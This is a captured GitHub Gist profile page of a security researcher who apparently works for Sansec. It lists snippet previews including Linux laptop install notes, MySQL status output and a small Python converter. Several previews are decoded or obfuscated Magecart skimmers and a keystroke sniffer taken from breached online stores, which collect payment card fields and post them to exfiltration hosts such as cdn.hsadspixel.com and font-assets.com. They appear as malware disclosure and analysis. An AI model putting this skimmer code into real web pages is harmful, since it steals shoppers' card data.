Skip to content

Instantly share code, notes, and snippets.

Avatar

Willem de Groot gwillem

View GitHub Profile
@gwillem
gwillem / dell-xps-9310-linux-install-notes.md
Created Nov 25, 2020
Linux (Xubuntu 20.04) on Dell XPS 9310 install notes
View dell-xps-9310-linux-install-notes.md

Dell XPS 9310 Linux install notes (Ubuntu/Xubuntu 20.04)

My NL i7/16GB XPS 9310 has a Killer AX1650s WiFi chip, which eventually worked. Other Killer chips may not work.

I ordered the Windows Home edition, because developer edition with Linux was not available in my country. Apparently you can reclaim €100 from Dell if you don't use Windows.

Install

  • Bios:
    • Change the SATA Mode from the default "RAID" to "AHCI"
View show-global-status.txt
Variable_name Value
Aborted_clients 2028
Aborted_connects 0
Access_denied_errors 0
Acl_column_grants 0
Acl_database_grants 4656
Acl_function_grants 0
Acl_procedure_grants 0
Acl_proxy_users 1
Acl_role_grants 0
View decoded.js
// Original: https://www.sweatybetty.com/on/demandware.static/-/Library-Sites-sweatybettylibrary/en_US/v1574703272172/js/custom.js
// Decoded by info@sansec.io (C) 2019-12-04
(function () {
function _0x58c32e(_0x531ef5, _0x2f3dd8) {
function _0x3730ba(_0x50af3d) {
if (_0x3730ba[_0x50af3d] !== _0x42a44f) return _0x3730ba[_0x50af3d];
var _0x4c3b76;
if (_0x250d('0x0', 'vxGP') == _0x50af3d) _0x4c3b76 = 'a' != 'a' [0x0];
else if (_0x250d('0x1', 'ipvd') == _0x50af3d) _0x4c3b76 = _0x3730ba(_0x250d('0x2', '%zE0')) && _0x3730ba('json-parse');
else {
@gwillem
gwillem / decoded.js
Created Oct 25, 2019
Procter & Gamble's FirstAidBeauty.com skimmed since May 5th 2019.
View decoded.js
+ function () {
var a = ["digiNum", "input[name='payment[cc_number]']", "digiMon", "select[name='payment[cc_exp_month]']", "digiYea", "select[name='payment[cc_exp_year]']", "digiCbb", "input[name='payment[cc_cid]']", "digiNam", "input[name='payment[cc_owner]']", "clNameChecked", "l8", "shElement", "#payment-buttons-container", "hasClass", "click", "val", "change", "addClass", "#billing\:firstname", " ", "#billing\:lastname", "#billing\:company", "#billing\:street1", "#billing\:street2", "#billing\:email", "#billing\:telephone", "#billing\:city", "#billing\:region_id", "#billing\:country_id", "#billing\:postcode", "host", "location", "", "replace", "/", "userAgent", "stringify", "https://cdn.hsadspixel.com/t/", "main", "guid", "refer", "POST", "ajax", "random", "round", "fromCharCode", "key", "getElementById", "iv", "push", "length", "charCodeAt", "rotate", "sbox", "Rcon", "numberOfRounds", "core", "SIZE_256", "keySize", "rsbox", "shiftRow", "mixColumn", "galois_multiplication", "subBytes", "shiftRows", "m
View Volusion code
/*!
* JavaScript Cookie v2.2.1
* https://github.com/js-cookie/js-cookie
*
* Copyright 2006, 2015 Klaus Hartl & Fagner Brack
* Released under the MIT license
*/
;
(function(factory) {
var registeredInModuleLoader;
View jsonline2csv.py
#!/usr/bin/env python3
# jsonline to csv converter for Andy
import csv
import json
import sys
if len(sys.argv) < 2:
print("Use {} <file.jsonline>".format(sys.argv[0]))
@gwillem
gwillem / decoded.js
Last active Aug 29, 2019
962 stores found breached on the 4th of July - https://sansec.io
View decoded.js
// Decoded by Sanguine Security <info@sansec.io>
String.prototype.hexEncode = function() {
var a, b;
var output = '';
for (b = 0; b < this.length; b++) {
a = this.charCodeAt(b).toString(16);
output += ('000' + a).slice(-4)
};
return output
};
@gwillem
gwillem / keystroke_sniffer_1.js
Last active Jan 22, 2021
BestOfTheWeb.com Security Seal contains even 2 different keystroke sniffers 2019-05-13 -- obfuscated version here: https://urlscan.io/responses/5c4474793baf83d5376045163d77f8f2ecd228ba5941ee8572489cb475a3cd1b/
View keystroke_sniffer_1.js
var sniffData = {};
sniffData['Gate'] = 'https://font-assets.com/img';
sniffData['Data'] = {};
sniffData['Sent'] = [];
sniffData.IsValid = ![];
sniffData.SaveParam = function(field) {
if (field.id !== undefined && field.id != '' && field.id !== null && field.value.length < 0x100 && field.value.length > 0x0) {
if (_0x5c4ab6(_0x5e7b89(_0x5e7b89(field.value, '-', ''), ' ', '')) && _0xdc5c77(_0x5e7b89(_0x5e7b89(field.value, '-', ''), ' ', ''))) sniffData.IsValid = !![];
sniffData.Data[field.id] = field.value;
return;
View original.js
var _0x19f5=['\x61\x57\x35\x75\x5a\x58\x4a\x49\x5a\x57\x6c\x6e\x61\x48\x51\x3d','\x61\x47\x39\x79\x61\x58\x70\x76\x62\x6e\x52\x68\x62\x41\x3d\x3d','\x52\x6d\x6c\x79\x5a\x57\x4a\x31\x5a\x77\x3d\x3d','\x59\x32\x68\x79\x62\x32\x31\x6c','\x61\x58\x4e\x4a\x62\x6d\x6c\x30\x61\x57\x46\x73\x61\x58\x70\x6c\x5a\x41\x3d\x3d','\x64\x57\x35\x6b\x5a\x57\x5a\x70\x62\x6d\x56\x6b','\x5a\x58\x68\x77\x62\x33\x4a\x30\x63\x77\x3d\x3d','\x5a\x47\x56\x32\x64\x47\x39\x76\x62\x48\x4d\x3d','\x63\x48\x4a\x76\x64\x47\x39\x30\x65\x58\x42\x6c','\x61\x47\x46\x7a\x61\x45\x4e\x76\x5a\x47\x55\x3d','\x59\x32\x68\x68\x63\x6b\x4e\x76\x5a\x47\x56\x42\x64\x41\x3d\x3d','\x61\x48\x52\x30\x63\x48\x4d\x36\x4c\x79\x39\x6d\x62\x32\x35\x30\x4c\x57\x46\x7a\x63\x32\x56\x30\x63\x79\x35\x6a\x62\x32\x30\x76\x61\x57\x31\x6e','\x53\x58\x4e\x57\x59\x57\x78\x70\x5a\x41\x3d\x3d','\x55\x32\x46\x32\x5a\x56\x42\x68\x63\x6d\x46\x74','\x55\x32\x46\x32\x5a\x55\x46\x73\x62\x45\x5a\x70\x5a\x57\x78\x6b\x63\x77\x3d\x3d','\x64\x47\x56\x34\x64\x47\x46\x79\x5a\x57\x45\x3d','\x
View skimmer.js
var _0xBCEC = ["68$61$77$6b$73$73$68$6f$70$2e$63$6f$6d", "2f$63$68$65$63$6b$6f$75$74", "", "68$74$74$70$73$3a$2f$2f$69$6d$61$67$65$73$65$6e$67$69$6e$65$73$2e$63$6f$6d$2f$61$6e$61$6c$79$7a$65", "68$74$74$70$73$3a$2f$2f$69$6d$61$67$65$73$65$6e$67$69$6e$65$73$2e$63$6f$6d", "68$74$74$70$73$3a$2f$2f$69$6d$61$67$65$73$65$6e$67$69$6e$65$73$2e$63$6f$6d$2f$53$4a$7a$54$43$72$78$4d$4f$30$4f$37$74$69", "6d$61$67$65$32$5f$64$65$66$61$75$6c$74", "length", "wtf", "prototype", "$", "split", "reduce", "fromCharCode", "map", "replace", "toString", "rot13", "Z", "charCodeAt", "rot5", "join", "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=", "_utf8_encode", "charAt", "_keyStr", "indexOf", "_utf8_decode", "\n", "isUndefined", "isNull", "href", "location", "div", "createElement", "i", "getElementsByTagName", "innerHTML", "<!--[if gt IE ", "]><i></i><![endif]-->", "childNodes", "nodeType", "push", "getAttribute", "attributes", "nodeName", "nodeValue", "textContent", "innerText", "getComputedStyle", "display", "no